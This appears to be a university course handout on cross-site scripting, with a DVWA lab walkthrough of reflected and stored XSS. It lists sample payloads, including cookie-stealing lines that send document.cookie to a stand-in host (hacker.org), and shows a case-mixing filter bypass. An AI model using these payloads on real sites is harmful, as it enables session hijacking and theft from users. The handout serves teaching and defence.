A full course of what is Cross-Site Scripting, how it affects us, how we can protect against XSS, etc.

1. University of Craiova
Faculty of Automatics, Computers and Electronics
Cross-Site Scripting
-course-
Cristian Alexandrescu

2. Contents
1. Introduction...........................................................................................................................................3
1.1 What is Cross-site scripting (XSS)?....................................................................................................3
1.2 How do the XSS codes look like?.......................................................................................................3
1.3 How can XSS affect a web page? .......................................................................................................3
1.4 How can XSS affect us as admins, users, or visitors? ........................................................................3
1.5 How is perceived XSS from the attacker’s perspective? ....................................................................3
1.6 What is a WAF?..................................................................................................................................4
2. Classification.........................................................................................................................................4
2.1 Reflected XSS.....................................................................................................................................4
2.2 Stored XSS..........................................................................................................................................4
3. Possible scenario...................................................................................................................................5
3.1 Reflected XSS.....................................................................................................................................5
3.2 Stored XSS..........................................................................................................................................8
4. Methods of protection.........................................................................................................................13
5. Conclusions.........................................................................................................................................14
Bibliography ...............................................................................................................................................15

3. 3
1. Introduction
In the last year this type of vulnerability is more frequent on websites. First we need to know
what does this vulnerability represents, how to exploit it and how to protect against her.
1.1 What is Cross-site scripting (XSS)?
This type of vulnerability exists and will continue to exist for the web developers. Web
developers are usually careless and very often leave search buttons or other HTML object
unprotected that can have a direct relation with the web pages or with the database.
1.2 How do the XSS codes look like?
The commands are nothing else than simple HTML and JS:
<img src="malicious.js">
<script>alert('XSS')</script>
<iframe="malitious.js">
<script>document.write('<img
src="http://hacker.org/+document.cookie+"')</script>
<a href="javascript:…">press here</a>
<script>document.location.replace('http://hacker.org/steal.cgi?'
+document.cookie);</script>
Hello World! <SCRIPT>malicious code</SCRIPT>
1.3 How can XSS affect a web page?
As the commands show, we can easily figure out how we can execute some code over a page.
Thus an attacker might steal information from our computer, more precisely from our browser
with a simple enter on the website.
1.4 How can XSS affect us as admins, users, or visitors?
It doesn’t matter the rank that we own on the website, stored XSS can do a lot of harm.
The worse part is that XSS remains hidden over a long period of time until someone will
discover it and it might be too late for some computers, accounts, or even the server/website.
1.5 How is perceived XSS from the attacker’s perspective?
We can say that a Cross site scripting vulnerability gives access to the victim’s cookies, this will
result in a session hijaking from which an attacker could enter to an account on that website
without authentification.

4. 4
Currently, there are many banks that have already implemented session token with a clock of
inactivity which will give a higher security for that company and its customers.
1.6 What is a WAF?
Web Application Firewall can be a plugin and/or a set of filters based on a few predefined rules
that bans any unauthorized person from using certain commands. The most frequent WAFs are
for SQLi and XSS. A WAF can block IPs, the attacker will get HTTP errors like 404, 403, 406,
Mod Security, redirect to other pages, etc. Thus making a WAF almost impossible for an attacker
to bypass it and get certain vulnerability.
2. Classification
In this lab, I will emphasize the XSS vulnerability from DVWA (Damn Vulnerable Web
Application). XSS vulnerabilities are classified as such:
2.1 Reflected XSS
This type of XSS vulnerability is often found in search buttons or $_GET parameters that affects
the page for a short period of time. The malicious code does not remain on the web page, if we
refresh the web page, the malicious code will disappear.
2.2 Stored XSS
In comparison to reflected XSS, the stored XSS, as the name suggests, stores the malicious code
on the database of the server and will execute it each time you refresh the page.

5. 5
3. Possible scenario
3.1 Reflected XSS
In the following page I will try to write a simple text to check the application’s behavior.
I notice that the web page outputs my text entered before. For the next example I will try a
simple HTML code.
Once I execute the HTML code, I can also add an alert script with JavaScript. This is the most
common/simple example of a Cross-site scripting vulnerability.

6. 6
The next example is on the medium difficulty of the DVWA.
If I directly try the following code <script>alert('xss')</script> what would I get?
Seems like the <script> code was not executed. I will try again with a simple HTML code.

7. 7
However the HTML codes are working, meaning that we have a WAR on the application.
I need to modify the script structure in order to bypass the WAF. I already saw that the <> don’t
have a WAF on them, because the HTML code was executed properly.
This means only the script has a WAF. To bypass it easily, write some letters with uppercase and
other with lowercase:
<sCriPt>alert('xss')</sCriPt>

8. 8
3.2 Stored XSS
This time, the application has 2 fields: one for name and the other for message. Again I will write
simple text to check the application’s behavior.
What if I try bold from HTML?
Works perfect, but what the application will do when I will try with <script>?

9. 9
In the second example, the JavaScript code is similar with the previous one. The only difference
is that the application now stores the malicious code inside the database and even if we refresh
the page, the result remains the same.
I will delete the JS code from the database, because I do not want this pop-up to appear every
time I am on the page. I will raise the difficulty to medium because I am already bored on the
easy version or stored XSS.
The same like the last time, simple HTML code into the message field.
Nothing happens, but why?

10. 10
It is very clear that the HTML is not executed because he has a WAF on it. I think the <> have
WAF on them. More then 90% of the XSS codes have the <> into the composition. So now, I
have left only the name field.I will write the same JS code with script alert like the last time.
Seems like I have a problem: it does not let me enter more then 10 characters. What can be done
in this situation? I need an add-on for firefox named firebug through which we can modify the
existing HTML code.To use it, just right click on the name field and select the option: Inspect
Element with Firebug.
A new window will appear on the screen with all the HTML code on the web page. I will modify
the maxlenght of the input from 10 to 100.

11. 11
Now that the input was modified, I can write 100 characters on that input, until sending the
request to the server.
What will happen if I write the same code with script alert like the last time?
Seems like I have the same problem, the <> are not executed.
I will try to bypass them with <sCriPt>alert('xss')</sCriPt>.

12. 12
It worked! WAF bypassed on field name.

13. 13
4. Methods of protection
https://code.google.com/p/php-antixss/
https://gist.github.com/mbijon/1098477
http://finn-no.github.io/xss-html-filter/
https://code.google.com/p/xssprotect/

14. 14
5. Conclusions
Cross-site scripting is one of the most dangerous vulnerabilities. This vulnerability can cause
damage to his visitors/customers. With malicious JS code an attacker can send even a malware or
a CryptoLocker. It usually causes only the session hijacking because once the cookies are stolen,
the attacker can act like the person and do all the options that previously he was not allowed.
An owner of a server/website, has the responsibility to create secure applications that protect the
user information.

15. 15
Bibliography
https://www.acunetix.com/websitesecurity/cross-site-scripting/
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#A_Pos
itive_XSS_Prevention_Model
https://www.wordfence.com/learn/how-to-prevent-cross-site-scripting-attacks/